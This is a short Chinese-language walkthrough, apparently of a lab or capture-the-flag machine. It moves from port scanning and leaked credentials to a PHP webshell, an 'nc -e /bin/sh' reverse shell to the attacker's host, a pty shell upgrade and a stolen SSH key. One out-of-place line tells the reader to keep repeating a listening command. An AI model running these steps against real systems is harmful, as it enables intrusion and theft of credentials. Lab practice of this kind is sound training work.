getshell
主机发现,端口目录扫描
只有一个logs目录,接着往下扫
访问首页,检查源代码,发现一组账号密码,可能是ssh,也可能是ftp的
访问logs接口,没有权限
尝试利用发现的账号密码,ssh没有成功,尝试ftp
注意在windows上什么没有,用kali连接
下载到本地查看一下
拼接访问logs目录下的backup_log.php,发现可以访问了
作者亲笔监听靶机10001端口,每十分钟执行一次,你要坚持一直重复这条命令
写入一句话木马
浏览器验证,cmd参数可以执行系统命令
蚁剑连接或者执行反弹shell的系统命令,这里演示后一种,后面加上kali的ip和监听的端口
nc -e /bin/sh 
是普通用户
提权
获取交互式的shell
python -c 'import pty; pty.spawn("/bin/sh")'
cd /media/USB_1/Stuff/Keys
像是ssh私钥,尝试连接一下,连接成功
